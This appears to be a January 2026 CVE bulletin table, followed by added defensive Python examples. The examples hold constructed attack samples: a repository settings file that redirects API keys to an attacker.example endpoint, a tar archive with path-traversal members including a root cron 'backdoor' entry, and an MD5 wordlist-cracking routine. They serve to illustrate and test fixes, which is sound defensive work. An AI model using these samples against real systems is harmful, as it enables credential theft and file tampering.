| AncoraThemes--DiveIt | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes DiveIt diveit allows PHP Local File Inclusion. This issue affects DiveIt: from n/a through <= 1.4.3. | 2026-01-22 | not yet calculated | CVE-2025-69059 | https://patchstack.com/database/Wordpress/Theme/diveit/vulnerability/wordpress-diveit-theme-1-4-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Hobo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Hobo hobo allows PHP Local File Inclusion. This issue affects Hobo: from n/a through <= 1.0.10. | 2026-01-22 | not yet calculated | CVE-2025-69077 | https://patchstack.com/database/Wordpress/Theme/hobo/vulnerability/wordpress-hobo-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Indoor Plants | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Indoor Plants indoor-plants allows PHP Local File Inclusion. This issue affects Indoor Plants: from n/a through <= 1.2.7. | 2026-01-22 | not yet calculated | CVE-2025-69066 | https://patchstack.com/database/Wordpress/Theme/indoor-plants/vulnerability/wordpress-indoor-plants-theme-1-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Malta | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Malta malta allows PHP Local File Inclusion. This issue affects Malta: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-69078 | https://patchstack.com/database/Wordpress/Theme/malta/vulnerability/wordpress-malta-theme-1-3-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Modern Housewife | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Modern Housewife modernhousewife allows PHP Local File Inclusion. This issue affects Modern Housewife: from n/a through <= 1.0.12. | 2026-01-22 | not yet calculated | CVE-2025-69076 | https://patchstack.com/database/Wordpress/Theme/modernhousewife/vulnerability/wordpress-modern-housewife-theme-1-0-12-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--MoveMe | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes MoveMe moveme allows PHP Local File Inclusion. This issue affects MoveMe: from n/a through <= 1.2.15. | 2026-01-22 | not yet calculated | CVE-2025-69061 | https://patchstack.com/database/Wordpress/Theme/moveme/vulnerability/wordpress-moveme-theme-1-2-15-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Muji | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Muji muji allows PHP Local File Inclusion. This issue affects Muji: from n/a through <= 1.2.0. | 2026-01-22 | not yet calculated | CVE-2025-69068 | https://patchstack.com/database/Wordpress/Theme/muji/vulnerability/wordpress-muji-theme-1-2-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--PartyMaker | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes PartyMaker partymaker allows PHP Local File Inclusion. This issue affects PartyMaker: from n/a through <= 1.1.15. | 2026-01-22 | not yet calculated | CVE-2025-69058 | https://patchstack.com/database/Wordpress/Theme/partymaker/vulnerability/wordpress-partymaker-theme-1-1-15-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Pearson Specter | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Pearson Specter pearsonspecter allows PHP Local File Inclusion. This issue affects Pearson Specter: from n/a through <= 1.11.3. | 2026-01-22 | not yet calculated | CVE-2025-69074 | https://patchstack.com/database/Wordpress/Theme/pearsonspecter/vulnerability/wordpress-pearson-specter-theme-1-11-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Pets Land | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Pets Land petsland allows PHP Local File Inclusion. This issue affects Pets Land: from n/a through <= 1.2.8. | 2026-01-22 | not yet calculated | CVE-2025-69064 | https://patchstack.com/database/Wordpress/Theme/petsland/vulnerability/wordpress-pets-land-theme-1-2-8-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Piqes | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Piqes piqes allows PHP Local File Inclusion. This issue affects Piqes: from n/a through <= 1.0.11. | 2026-01-22 | not yet calculated | CVE-2025-69073 | https://patchstack.com/database/Wordpress/Theme/piqes/vulnerability/wordpress-piqes-theme-1-0-11-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Prider | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Prider prider allows PHP Local File Inclusion. This issue affects Prider: from n/a through <= 1.1.3.1. | 2026-01-22 | not yet calculated | CVE-2025-69072 | https://patchstack.com/database/Wordpress/Theme/prider/vulnerability/wordpress-prider-theme-1-1-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Snow Mountain | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Snow Mountain snowmountain allows PHP Local File Inclusion. This issue affects Snow Mountain: from n/a through <= 1.4.3. | 2026-01-22 | not yet calculated | CVE-2025-69065 | https://patchstack.com/database/Wordpress/Theme/snowmountain/vulnerability/wordpress-snow-mountain-theme-1-4-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Tails | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Tails tails allows PHP Local File Inclusion. This issue affects Tails: from n/a through <= 1.4.12. | 2026-01-22 | not yet calculated | CVE-2025-69067 | https://patchstack.com/database/Wordpress/Theme/tails/vulnerability/wordpress-tails-theme-1-4-12-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--TanTum | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes TanTum tantum allows PHP Local File Inclusion. This issue affects TanTum: from n/a through <= 1.1.13. | 2026-01-22 | not yet calculated | CVE-2025-69071 | https://patchstack.com/database/Wordpress/Theme/tantum/vulnerability/wordpress-tantum-theme-1-1-13-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Tornados | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Tornados tornados allows PHP Local File Inclusion. This issue affects Tornados: from n/a through <= 2.1. | 2026-01-22 | not yet calculated | CVE-2025-69070 | https://patchstack.com/database/Wordpress/Theme/tornados/vulnerability/wordpress-tornados-theme-2-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--uReach | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes uReach ureach allows PHP Local File Inclusion. This issue affects uReach: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-69060 | https://patchstack.com/database/Wordpress/Theme/ureach/vulnerability/wordpress-ureach-theme-1-3-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Weedles | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Weedles weedles allows PHP Local File Inclusion. This issue affects Weedles: from n/a through <= 1.1.12. | 2026-01-22 | not yet calculated | CVE-2025-69062 | https://patchstack.com/database/Wordpress/Theme/weedles/vulnerability/wordpress-weedles-theme-1-1-12-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Yolox | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Yolox yolox allows PHP Local File Inclusion. This issue affects Yolox: from n/a through <= 1.0.15. | 2026-01-22 | not yet calculated | CVE-2025-69075 | https://patchstack.com/database/Wordpress/Theme/yolox/vulnerability/wordpress-yolox-theme-1-0-15-local-file-inclusion-vulnerability?_s_id=cve |
| Angel Costa--WP SEO Search | Cross-Site Request Forgery (CSRF) vulnerability in Angel Costa WP SEO Search wp-seo-search allows Cross Site Request Forgery. This issue affects WP SEO Search: from n/a through <= 1.1. | 2026-01-22 | not yet calculated | CVE-2025-67626 | https://patchstack.com/database/Wordpress/Plugin/wp-seo-search/vulnerability/wordpress-wp-seo-search-plugin-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Anritsu--ShockLine | Anritsu ShockLine CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu ShockLine. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CHX files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27833. | 2026-01-23 | not yet calculated | CVE-2025-15348 | ZDI-25-1199 |
| Anritsu--ShockLine | Anritsu ShockLine SCPI Race Condition Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Anritsu ShockLine. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SCPI component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27315. | 2026-01-23 | not yet calculated | CVE-2025-15349 | ZDI-25-1200 |
| Anritsu--VectorStar | Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CHX files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27039. | 2026-01-23 | not yet calculated | CVE-2025-15350 | ZDI-25-1201 |
| Anritsu--VectorStar | Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CHX files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27040. | 2026-01-23 | not yet calculated | CVE-2025-15351 | ZDI-25-1202 |
| anthropics--claude-code | Claude Code is an agentic coding tool. Prior to version 2.0.65, vulnerability in Claude Code's project-load flow allowed malicious repositories to exfiltrate data including Anthropic API keys before users confirmed trust. An attacker-controlled repository could include a settings file that sets ANTHROPIC_BASE_URL to an attacker-controlled endpoint and when the repository was opened, Claude Code would read the configuration and immediately issue API requests before showing the trust prompt, potentially leaking the user's API keys. Users on standard Claude Code auto-update have received this fix already. Users performing manual updates are advised to update to version 2.0.65, which contains a patch, or to the latest version. | 2026-01-21 | not yet calculated | CVE-2026-21852 | https://github.com/anthropics/claude-code/security/advisories/GHSA-jh7p-qr78-84p7 |
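The ordering problem in the Claude Code entry above (repository settings honoured, and an authenticated request issued, before the trust prompt) is easier to see in code. The block below is an added illustration, not Claude Code's own code: it contrasts the pre-fix ordering with one that decides trust first and ignores endpoint-affecting settings from an untrusted repository. The settings layout (an "env" block), the proxy key names, the default endpoint and the prompt callback are assumptions for this example; only ANTHROPIC_BASE_URL comes from the advisory.

```python
"""Added example, not Claude Code's own code: apply repository-supplied settings
only after the user has confirmed trust, so a settings file cannot redirect
authenticated API traffic to a foreign host. The settings layout ("env" block),
the proxy keys, the default endpoint and the prompt callback are assumptions."""
import json
from dataclasses import dataclass, field

DEFAULT_BASE_URL = "https://api.anthropic.com"   # assumed default endpoint
# Settings that change where a request (and the credential it carries) goes.
ENDPOINT_KEYS = {"ANTHROPIC_BASE_URL", "HTTPS_PROXY", "HTTP_PROXY"}

# Constructed sample: a repository-local settings file that points the
# client at an attacker-controlled endpoint.
MALICIOUS_REPO_SETTINGS = json.dumps({
    "env": {"ANTHROPIC_BASE_URL": "https://api.attacker.example"},
    "model": "assumed-model-id",
})


@dataclass
class Session:
    base_url: str = DEFAULT_BASE_URL
    requests_sent: list = field(default_factory=list)

    def send(self) -> None:
        """Stand-in for an authenticated API call; records its destination."""
        self.requests_sent.append(self.base_url)


def load_repo_settings(raw: str, trusted: bool) -> dict:
    """Parse repository settings; strip endpoint overrides unless trusted."""
    settings = json.loads(raw)
    env = dict(settings.get("env", {}))
    if not trusted:
        env = {k: v for k, v in env.items() if k not in ENDPOINT_KEYS}
    return {**settings, "env": env}


def open_project_vulnerable(raw: str, ask_trust) -> Session:
    """Pre-fix ordering: settings applied and a request sent, then the prompt."""
    session = Session()
    settings = load_repo_settings(raw, trusted=True)
    session.base_url = settings["env"].get("ANTHROPIC_BASE_URL", session.base_url)
    session.send()          # the credential is already on its way to the repo's URL
    ask_trust()
    return session


def open_project_fixed(raw: str, ask_trust) -> Session:
    """Fixed ordering: nothing leaves the machine until trust is decided, and
    endpoint overrides are honoured only after an explicit yes."""
    session = Session()
    trusted = bool(ask_trust())
    settings = load_repo_settings(raw, trusted=trusted)
    session.base_url = settings["env"].get("ANTHROPIC_BASE_URL", session.base_url)
    session.send()
    return session
```

The important property is not the filtering itself but that no request carrying the key is made before `ask_trust()` returns; any setting that can change a request's destination (base URL, proxies, custom CA bundles) belongs in the gated set.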
| Antideo--Antideo Email Validator | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Antideo Antideo Email Validator antideo-email-validator allows Blind SQL Injection. This issue affects Antideo Email Validator: from n/a through <= 1.0.10. | 2026-01-22 | not yet calculated | CVE-2025-68017 | https://patchstack.com/database/Wordpress/Plugin/antideo-email-validator/vulnerability/wordpress-antideo-email-validator-plugin-1-0-10-sql-injection-vulnerability?_s_id=cve |
| antoniobg--ABG Rich Pins | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in antoniobg ABG Rich Pins abg-rich-pins allows Stored XSS. This issue affects ABG Rich Pins: from n/a through <= 1.1. | 2026-01-23 | not yet calculated | CVE-2026-24558 | https://patchstack.com/database/Wordpress/Plugin/abg-rich-pins/vulnerability/wordpress-abg-rich-pins-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Apache Software Foundation--Apache Linkis | A vulnerability in Apache Linkis. Problem Description: When using the JDBC engine and data source functionality, if the URL parameter configured on the frontend has undergone multiple rounds of URL encoding, it may bypass the system's checks. This bypass can trigger a vulnerability that allows unauthorized access to system files via JDBC parameters. Scope of Impact: This issue affects Apache Linkis: from 1.3.0 through 1.7.0. Severity level: moderate. Solution: Continuously check if the connection information contains the "%" character; if it does, perform URL decoding. Users are recommended to upgrade to version 1.8.0, which fixes the issue. More questions about this vulnerability can be discussed here: https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve | 2026-01-19 | not yet calculated | CVE-2025-29847 | https://lists.apache.org/thread/03l5rfkgdt022o75jp8x4tzpqxz8g057 |
| Apache Software Foundation--Apache Linkis | A sensitive-information leak through log files in Apache Linkis. When org.apache.linkis.metadata.util.HiveUtils.decode() fails to perform Base64 decoding, it records the complete input parameter string in the log via logger.error(str + "decode failed", e). If the input parameter contains sensitive information such as Hive Metastore keys, plaintext passwords will be left in the log files when decoding fails, resulting in information leakage. Affected Scope: Component: sensitive fields in hive-site.xml (e.g., javax.jdo.option.ConnectionPassword) or other fields encoded in Base64. Version: Apache Linkis 1.0.0 - 1.7.0. Trigger Conditions: the value of the configuration item is an invalid Base64 string, and log files are readable by users other than hive-site.xml administrators. Severity: Low. The probability of Base64 decoding failure is low, and the leakage is only triggered when logs at the Error level are exposed. Remediation: Apache Linkis 1.8.0 and later versions have replaced the log with desensitized content: logger.error("URL decode failed: {}", e.getMessage()); // no longer outputs str. Users are recommended to upgrade to version 1.8.0, which fixes the issue. | 2026-01-19 | not yet calculated | CVE-2025-59355 | https://lists.apache.org/thread/75z7vhftw6w1mllndgpkfmcj0fzo4lbj https://lists.apache.org/thread/4dcgmqdkk2p5y4k43ok5rgd4ylx8698h |
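The logging defect in the entry above is a pattern worth recognising in any code base: an exception handler that echoes the failing input. The block below is an added example, not Linkis code; it reproduces the leaky handler and a redacted one that records the configuration key and input length instead of the value. The logger name, key names and sample values are constructed.

```python
"""Added example, not Linkis code: the logging pattern the advisory describes
(input echoed into the error log on decode failure) beside a redacted version.
Logger name, key names and sample values are constructed for this illustration."""
import base64
import binascii
import logging

LOG_LINES = []   # in-memory sink so the behaviour can be inspected offline


class _ListHandler(logging.Handler):
    def emit(self, record):
        LOG_LINES.append(self.format(record))


log = logging.getLogger("hive-utils-example")
log.addHandler(_ListHandler())
log.setLevel(logging.ERROR)
log.propagate = False


def decode_leaky(value: str):
    """Mirrors logger.error(str + "decode failed", e): the raw input lands in the log."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError) as exc:
        log.error("%sdecode failed: %s", value, exc)
        return None


def decode_redacted(value: str, key: str = "<unknown>"):
    """Log what is needed to diagnose the failure, never the value itself."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError) as exc:
        log.error("Base64 decode failed for %s (input length %d): %s", key, len(value), exc)
        return None


def last_log_line() -> str:
    return LOG_LINES[-1] if LOG_LINES else ""
```

Note that the exception text is still included: for a Base64 failure it names the problem ("Incorrect padding", "Non-base64 digit found") without repeating the input, which is what an operator needs to fix hive-site.xml.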
| Apache Software Foundation--Apache Solr | Deployments of Apache Solr 5.3.0 through 9.10.0 that rely on Solr's "Rule Based Authorization Plugin" are vulnerable to allowing unauthorized access to certain Solr APIs, due to insufficiently strict input validation in those components. Only deployments that meet all of the following criteria are impacted by this vulnerability: * Use of Solr's "RuleBasedAuthorizationPlugin" * A RuleBasedAuthorizationPlugin config (see security.json) that specifies multiple "roles" * A RuleBasedAuthorizationPlugin permission list (see security.json) that uses one or more of the following pre-defined permission rules: "config-read", "config-edit", "schema-read", "metrics-read", or "security-read". * A RuleBasedAuthorizationPlugin permission list that doesn't define the "all" pre-defined permission * A networking setup that allows clients to make unfiltered network requests to Solr. (i.e. user-submitted HTTP/HTTPS requests reach Solr as-is, unmodified or restricted by any intervening proxy or gateway) Users can mitigate this vulnerability by ensuring that their RuleBasedAuthorizationPlugin configuration specifies the "all" pre-defined permission and associates the permission with an "admin" or other privileged role. Users can also upgrade to a Solr version outside of the impacted range, such as the recently released Solr 9.10.1. | 2026-01-21 | not yet calculated | CVE-2026-22022 | https://lists.apache.org/thread/d59hqbgo7p62myq7mgfpz7or8n1j7wbn |
| Apache Software Foundation--Apache Solr | The "create core" API of Apache Solr 8.6 through 9.10.0 lacks sufficient input validation on some API parameters, which can cause Solr to check the existence of and attempt to read file-system paths that should be disallowed by Solr's "allowPaths" security setting https://solr.apache.org/guide/solr/latest/configuration-guide/configuring-solr-xml.html#the-solr-element . These read-only accesses can allow users to create cores using unexpected configsets if any are accessible via the filesystem. On Windows systems configured to allow UNC paths this can additionally cause disclosure of NTLM "user" hashes. Solr deployments are subject to this vulnerability if they meet the following criteria: * Solr is running in its "standalone" mode. * Solr's "allowPath" setting is being used to restrict file access to certain directories. * Solr's "create core" API is exposed and accessible to untrusted users. This can happen if Solr's RuleBasedAuthorizationPlugin https://solr.apache.org/guide/solr/latest/deployment-guide/rule-based-authorization-plugin.html is disabled, or if it is enabled but the "core-admin-edit" predefined permission (or an equivalent custom permission) is given to low-trust (i.e. non-admin) user roles. Users can mitigate this by enabling Solr's RuleBasedAuthorizationPlugin (if disabled) and configuring a permission-list that prevents untrusted users from creating new Solr cores. Users should also upgrade to Apache Solr 9.10.1 or greater, which contain fixes for this issue. | 2026-01-21 | not yet calculated | CVE-2026-22444 | https://lists.apache.org/thread/qkrb9dd4xrlqmmq73lrhkbfkttto2d1m |
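Both Solr entries above reduce to conditions on security.json, so they can be checked mechanically across a fleet. The block below is an added example, not Solr code: it audits a security.json for the CVE-2026-22022 preconditions (several roles, one of the listed pre-defined permissions, no "all" rule) and the CVE-2026-22444 ones (plugin disabled, or "core-admin-edit" reachable by non-admin roles or by no rule at all). The two sample files are constructed, their credential strings are placeholders, and which role names count as privileged (ADMIN_ROLES) is an assumption.

```python
"""Added example, not Solr code: audit a security.json for the configuration
conditions described in the two Solr advisories. Sample files are constructed;
credential strings are placeholders; ADMIN_ROLES is an assumption."""
import json

# Pre-defined permissions that CVE-2026-22022 names as affected.
AFFECTED_PREDEFINED = {"config-read", "config-edit", "schema-read",
                       "metrics-read", "security-read"}
ADMIN_ROLES = {"admin"}


def _roles(rule) -> set:
    role = rule.get("role")
    if role is None:
        return set()
    return {role} if isinstance(role, str) else set(role)


def audit_security_json(text: str, admin_roles=ADMIN_ROLES) -> list:
    """Return a list of findings; an empty list means neither condition holds."""
    authz = json.loads(text).get("authorization", {})
    findings = []
    if authz.get("class") != "solr.RuleBasedAuthorizationPlugin":
        return ["CVE-2026-22444: RuleBasedAuthorizationPlugin is not enabled, so the "
                "create-core API is reachable by any client"]
    perms = authz.get("permissions", [])
    names = {p.get("name") for p in perms}
    roles = set()
    for p in perms:
        roles |= _roles(p)
    for r in authz.get("user-role", {}).values():
        roles |= {r} if isinstance(r, str) else set(r)
    roles.discard("*")   # the wildcard is not a role of its own
    if "all" not in names and len(roles) > 1 and names & AFFECTED_PREDEFINED:
        findings.append("CVE-2026-22022: multiple roles, affected pre-defined permissions "
                        f"{sorted(names & AFFECTED_PREDEFINED)} and no 'all' rule")
    core_rules = [p for p in perms if p.get("name") == "core-admin-edit"]
    if "all" not in names and not core_rules:
        findings.append("CVE-2026-22444: no rule covers core-admin-edit and no 'all' "
                        "catch-all; requests that match no rule are allowed")
    for p in core_rules:
        low_trust = _roles(p) - set(admin_roles)
        if low_trust:
            findings.append("CVE-2026-22444: core-admin-edit granted to non-admin roles "
                            f"{sorted(low_trust)}")
    return findings


_AUTHN = {"class": "solr.BasicAuthPlugin", "blockUnknown": True,
          "credentials": {"solr": "<hash> <salt>", "ops": "<hash> <salt>",
                          "reader": "<hash> <salt>"}}

# Constructed: three roles, config-edit in use, no "all", core creation for "ops".
VULNERABLE_SECURITY_JSON = json.dumps({
    "authentication": _AUTHN,
    "authorization": {"class": "solr.RuleBasedAuthorizationPlugin",
                      "permissions": [
                          {"name": "security-edit", "role": "admin"},
                          {"name": "config-edit", "role": "admin"},
                          {"name": "core-admin-edit", "role": "ops"},
                          {"name": "read", "role": "*"}],
                      "user-role": {"solr": ["admin", "ops"], "ops": "ops",
                                    "reader": "reader"}},
})

# Same deployment after the mitigations: core-admin-edit restricted to admin and
# an "all" rule placed last, so the more specific rules above it still match
# first and everything else falls through to admin.
FIXED_SECURITY_JSON = json.dumps({
    "authentication": _AUTHN,
    "authorization": {"class": "solr.RuleBasedAuthorizationPlugin",
                      "permissions": [
                          {"name": "security-edit", "role": "admin"},
                          {"name": "config-edit", "role": "admin"},
                          {"name": "core-admin-edit", "role": "admin"},
                          {"name": "read", "role": "*"},
                          {"name": "all", "role": "admin"}],
                      "user-role": {"solr": ["admin", "ops"], "ops": "ops",
                                    "reader": "reader"}},
})
```

Solr evaluates permissions in order and applies the first match, which is why the "all" rule goes at the end of the list: placed first it would route every request to the admin role. The checker is a configuration audit only; it does not replace upgrading to 9.10.1.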
| Apple--Container | The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0. | 2026-01-22 | not yet calculated | CVE-2026-20613 | https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3 |
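The Apple Container entry above is the archive-extraction form of path traversal: a member named with ".." or an absolute path is written wherever it points. The block below is an added example, not code from apple/container or apple/containerization: it validates each member's resolved path (and, for links, the link target) against the destination root before extracting. The tar archive is built in memory as a constructed sample and its member names are made up.

```python
"""Added example, not code from apple/container: validate every archive member's
path (and link target) against the destination root before extracting it, so
".." components or absolute names cannot write outside that root. The archive
and its member names are constructed for this illustration."""
import io
import os
import shutil
import tarfile
import tempfile


def is_contained(dest_root: str, relative_path: str) -> bool:
    """True if dest_root/relative_path resolves to a location under dest_root."""
    root = os.path.realpath(dest_root)
    target = os.path.realpath(os.path.join(root, relative_path))
    return target == root or target.startswith(root + os.sep)


def safe_extract(archive: bytes, dest_root: str) -> tuple:
    """Extract files, directories and in-root links; return (extracted, rejected)."""
    os.makedirs(dest_root, exist_ok=True)
    extracted, rejected = [], []
    # Newer Pythons also enforce a "data" filter; use it when present.
    extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for member in tar:
            name = member.name
            if os.path.isabs(name) or not is_contained(dest_root, name):
                rejected.append(name)
                continue
            if member.issym() or member.islnk():
                # hard-link targets are archive-relative; symlink targets are
                # relative to the link's own directory
                link = (member.linkname if member.islnk()
                        else os.path.join(os.path.dirname(name), member.linkname))
                if os.path.isabs(member.linkname) or not is_contained(dest_root, link):
                    rejected.append(name)
                    continue
            elif not (member.isfile() or member.isdir()):
                rejected.append(name)      # devices, fifos and the like are never wanted
                continue
            tar.extract(member, dest_root, **extra)
            extracted.append(name)
    return extracted, rejected


def build_sample_archive() -> bytes:
    """Constructed archive: one legitimate file plus three traversal attempts."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name, data):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        add_file("app/config.yml", b"port: 8080\n")
        add_file("../escaped.txt", b"outside the root\n")
        add_file("app/../../../etc/cron.d/backdoor", b"* * * * * root id\n")
        link = tarfile.TarInfo("app/passwd")          # symlink pointing out of the root
        link.type = tarfile.SYMTYPE
        link.linkname = "../../../etc/passwd"
        tar.addfile(link)
    return buf.getvalue()


def run_demo() -> tuple:
    """Extract the sample into a scratch directory; report what landed where."""
    work = tempfile.mkdtemp(prefix="safe-extract-")
    try:
        extracted, rejected = safe_extract(build_sample_archive(), os.path.join(work, "out"))
        escaped = os.path.exists(os.path.join(work, "escaped.txt"))
        return extracted, rejected, escaped
    finally:
        shutil.rmtree(work, ignore_errors=True)
```

The `root + os.sep` comparison matters: a plain prefix test would accept "/srv/images-old/x" as inside "/srv/images". Checking each member immediately before extracting it also covers a directory symlink extracted earlier in the same archive, since realpath resolves it at that point.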
| Apryse--Apryse | A Local File Inclusion (LFI) and a Server-Side Request Forgery (SSRF) vulnerability was found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK thru 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover. | 2026-01-22 | not yet calculated | CVE-2025-56589 | http://apryse.com https://www.stratascale.com/resource/apryse-server-module-ssrf-lfi/ |
| Apryse--Apryse | An issue was discovered in the InsertFromURL() function of the Apryse HTML2PDF SDK thru 11.10. This vulnerability could allow an attacker to execute arbitrary operating system commands on the local server. | 2026-01-22 | not yet calculated | CVE-2025-56590 | http://apryse.com https://www.stratascale.com/resource/apryse-server-argument-injection-rce/ |
| Aptsys--Aptsys | An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform thru 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, usernames, and passwords hashed using MD5. As MD5 is a fast, broken hash function, the hashes can be cracked quickly with public wordlists and tools, exposing user credentials in plaintext. This allows remote attackers to perform unauthorized logins and potentially gain access to sensitive POS operations or backend functions. | 2026-01-23 | not yet calculated | CVE-2025-52026 | http://aptsys.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
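Why a leaked MD5 list is treated as plaintext, and what the endpoint should have stored, is shown below. This is an added example, not Aptsys code: the cashier records and wordlist are constructed, and nothing here reflects the real endpoint's field names or data.

```python
"""Added example, not Aptsys code: a single precomputed table recovers unsalted
MD5 hashes for every user at once, versus per-user salted scrypt. The cashier
records and wordlist are constructed for this illustration."""
import hashlib
import hmac
import os

# Constructed stand-in for the leaked cashier list.
CASHIER_RECORDS = [
    {"username": "till01", "md5": hashlib.md5(b"summer2024").hexdigest()},
    {"username": "till02", "md5": hashlib.md5(b"Passw0rd").hexdigest()},
    {"username": "manager", "md5": hashlib.md5(b"x7!Qv#9zLm2^").hexdigest()},
]
WORDLIST = ["123456", "password", "Passw0rd", "qwerty", "summer2024", "letmein"]


def crack_md5(records, wordlist) -> dict:
    """Hash the wordlist once and look every leaked hash up in it. With no salt,
    one table serves all users, which is why public tools recover these quickly."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {r["username"]: table[r["md5"]] for r in records if r["md5"] in table}


SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)


def hash_password(password: str, salt: bytes = None) -> str:
    """Per-user random salt plus a memory-hard KDF: no shared table, and each
    guess costs the attacker about 16 MiB of memory and measurable time."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return f"scrypt${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))
```

The stronger hash is the second fix, not the first: an account-listing endpoint should require authentication, and it should never return password hashes in any format.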
